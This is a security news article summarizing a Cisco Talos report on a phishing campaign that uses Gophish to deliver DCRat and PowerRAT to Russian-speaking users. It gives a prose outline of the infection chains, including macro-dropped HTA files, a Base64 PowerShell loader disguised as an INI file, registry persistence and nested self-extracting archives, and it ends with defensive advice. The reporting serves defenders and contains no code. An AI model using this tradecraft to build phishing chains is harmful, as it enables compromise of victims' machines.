Russian-speaking users have become the focus of a sophisticated phishing campaign using Gophish, an open-source phishing toolkit, to deliver two remote access trojans: DarkCrystal RAT (DCRat) and a newly identified PowerRAT. This campaign uses modular infection chains that rely on malicious documents (maldocs) or HTML-based infections, requiring user intervention to activate the infection, according to a report by Cisco Talos researcher Chetan Raghuprasad.
Phishing Campaign Details
The campaign is tailored for Russian-speaking users, inferred from the language in the phishing emails, the content of malicious documents, and links disguised as legitimate Russian services like Yandex Disk and VK.
Gophish is typically used by organizations to test their defenses against phishing, but in this case, a threat actor has exploited the framework to distribute DCRat or PowerRAT depending on the method of attack. Targets receive phishing emails containing either a malicious Microsoft Word document or an HTML file embedding JavaScript.
Once the victim opens the maldoc and enables macros, a Visual Basic (VB) macro executes a series of actions, including the extraction of an HTML Application (HTA) file and a PowerShell loader. The macro further configures a Windows Registry key to ensure that the HTA file runs every time the user logs in.
PowerRAT and DCRat Deployment
The HTA file delivers a JavaScript file responsible for executing the PowerShell loader via cscript.exe, a legitimate Windows binary. The PowerShell loader, disguised as an INI file, contains Base64-encoded data that decodes and executes PowerRAT in the victim's machine memory.
PowerRAT can perform system reconnaissance, gather drive serial numbers, and connect to remote servers in Russia for further instructions. If the command-and-control (C2) server is unreachable, PowerRAT executes an embedded PowerShell script, indicating the malware is still under development.
The alternate infection chain uses HTML files embedded with malicious JavaScript to deliver DCRat. When a victim clicks a malicious link, a remotely hosted HTML file is opened, triggering the download of a 7-Zip archive containing a password-protected SFX RAR file, which in turn delivers the RAT.
RAT Capabilities and Threat Evolution
DCRat is a modular RAT capable of stealing sensitive data, capturing screenshots and keystrokes, and providing remote access to the infected system. It also facilitates the download and execution of additional files and establishes persistence through Windows tasks.
Additionally, Cisco Talos pointed out that nested self-extracting archives used in this campaign have been previously seen in attacks distributing SparkRAT. The use of GitHub repositories for storing and retrieving malware components has been a common tactic in these attacks, further complicating detection and response efforts.
Protecting Against These Threats
Users are urged to:
- Avoid enabling macros in unsolicited Word documents.
- Verify the authenticity of email links before clicking.
- Use strong email filtering solutions to block phishing attempts.
- Monitor network traffic for unusual connections to suspicious domains or IP addresses.
This campaign, along with warnings from Cofense about virtual hard disk (VHD) files used to distribute other malware such as Remcos RAT and XWorm, underscores the growing complexity of phishing attacks and the need for robust email security practices.
